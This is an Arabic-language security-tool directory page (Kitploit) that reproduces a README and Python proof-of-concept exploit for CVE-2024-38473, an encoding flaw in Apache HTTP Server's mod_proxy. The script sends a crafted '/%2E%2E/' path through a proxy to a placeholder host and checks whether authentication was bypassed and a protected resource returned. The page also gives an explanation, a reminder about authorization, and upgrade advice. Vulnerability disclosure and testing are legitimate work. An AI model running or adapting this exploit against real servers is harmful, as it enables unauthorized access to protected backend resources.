Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-38473 — نصوص برمجية لإثبات المفهوم توضح ثغرة في الترميز في وحدة mod_proxy لخادم Apache HTTP (CVE-2024-38473) تسمح بتجاوز المصادقة عبر عناوين URL مصممة لخدمات الخلفية. | Kitploit
أدوات/GitHubGitHub/abdurahmon3236/cve-2024-38473
المصادقة والترخيصتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubabdurahmon3236/cve-2024-38473

CVE-2024-38473

نصوص برمجية لإثبات المفهوم توضح ثغرة في الترميز في وحدة mod_proxy لخادم Apache HTTP (CVE-2024-38473) تسمح بتجاوز المصادقة عبر عناوين URL مصممة لخدمات الخلفية.

عرض المستودع
32منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

إثبات المفهوم (PoC) لمشكلة الترميز في mod_proxy في خادم Apache HTTP

يحتوي هذا المستودع على نصوص إثبات المفهوم (PoC) لإظهار مشكلة ترميز في وحدة mod_proxy في إصدارات خادم Apache HTTP 2.4.59 وما قبلها. تسمح هذه الثغرة بإرسال عناوين URL للطلبات ذات الترميز غير الصحيح إلى الخدمات الخلفية، مما قد يؤدي إلى تجاوز المصادقة عبر طلبات مصممة.

جدول المحتويات

  • وصف الثغرة
  • الإعداد والاستخدام
  • اعتبارات مهمة
  • التخفيف

وصف الثغرة

CVE-ID: (قيد الانتظار)

نظرة عامة: مشكلة ترميز في وحدة mod_proxy في إصدارات خادم Apache HTTP 2.4.59 وما قبلها تسمح بإرسال عناوين URL للطلبات ذات الترميز غير الصحيح إلى الخدمات الخلفية. يمكن أن يؤدي هذا إلى تجاوز آليات المصادقة عبر طلبات مصممة. يُنصح المستخدمون بالترقية إلى الإصدار 2.4.60 الذي يعمل على إصلاح هذه المشكلة.

الإصدارات المتأثرة:

  • خادم Apache HTTP 2.4.59 وما قبلها

الإصدار المُصلَح:

  • خادم Apache HTTP 2.4.60

الإعداد والاستخدام

المتطلبات الأساسية

  • Python 3.x
  • مكتبة requests (pip install requests)

عرض الثغرة

  1. تحديد الخدمة الخلفية:

    • افترض أن الخدمة الخلفية موجودة على http://backend-service.example.com.
  2. صياغة طلب ضار:

    • سيستخدم الطلب الضار ترميزًا غير صحيح لتجاوز المصادقة.
  3. تشغيل نص PoC:

    • احفظ النص التالي باسم mod_proxy_poc.py وقم بتشغيله.

نص PoC

إليك نص Python الذي يعرض الثغرة:

root@kitploit:~
import requests

# التهيئة
proxy_url = "http://proxy-server.example.com"  # قم بتغيير هذا إلى عنوان URL الخاص بالخادم الوسيط
backend_service_path = "/protected/resource"  # المسار إلى المورد المحمي في الخدمة الخلفية
malicious_path = "/%2E%2E/protected/resource"  # مسار مشفر بشكل غير صحيح لتجاوز المصادقة

# الطلب الضار الذي سيتم إرساله عبر الخادم الوسيط
malicious_url = f"{proxy_url}{malicious_path}"

def send_malicious_request():
    try:
        # إرسال الطلب المصمم إلى الخادم الوسيط
        response = requests.get(malicious_url)
        
        # طباعة تفاصيل الاستجابة
        print("حالة الاستجابة:", response.status_code)
        print("رؤوس الاستجابة:", response.headers)
        print("محتوى الاستجابة:", response.text)
        
        if response.status_code == 200:
            print("[+] تم تجاوز المصادقة بنجاح والوصول إلى المورد المحمي.")
        else:
            print("[-] فشل في تجاوز المصادقة.")
    except Exception as e:
        print("[-] حدث خطأ:", str(e))

if __name__ == "__main__":
    send_malicious_request()

شرح

  1. التهيئة:

    • proxy_url: عنوان URL للخادم الوسيط.
    • backend_service_path: المسار إلى المورد المحمي في الخدمة الخلفية.
    • malicious_path: المسار المشفر بشكل غير صحيح لتجاوز المصادقة.
  2. send_malicious_request:

    • ينشئ عنوان URL ضارًا بالمسار المشفر بشكل غير صحيح.
    • يرسل طلب GET إلى الخادم الوسيط بعنوان URL الضار.
    • يطبع تفاصيل الاستجابة للتحقق مما إذا تم تجاوز المصادقة.

اعتبارات مهمة

  • التصاريح: تأكد من حصولك على إذن صريح لاختبار هذه الثغرة على النظام الهدف. الوصول غير المصرح به غير قانوني وغير أخلاقي.
  • بيئة الاختبار: قم بإجراء هذا الاختبار في بيئة خاضعة للرقابة لتجنب التأثير على الأنظمة الإنتاجية.

التخفيف

لتخفيف هذه الثغرة، قم بالترقية إلى خادم Apache HTTP الإصدار 2.4.60، الذي يعمل على إصلاح مشكلة الترميز في وحدة mod_proxy.

  • تعليمات الترقية:
    • اتبع توثيق خادم Apache HTTP الرسمي لتنزيل وتثبيت أحدث إصدار.

من خلال الحفاظ على تحديث برامجك واتباع أفضل ممارسات الأمان، يمكنك منع ثغرات مثل مشكلة الترميز هذه في وحدة mod_proxy.

تنزيل الأداة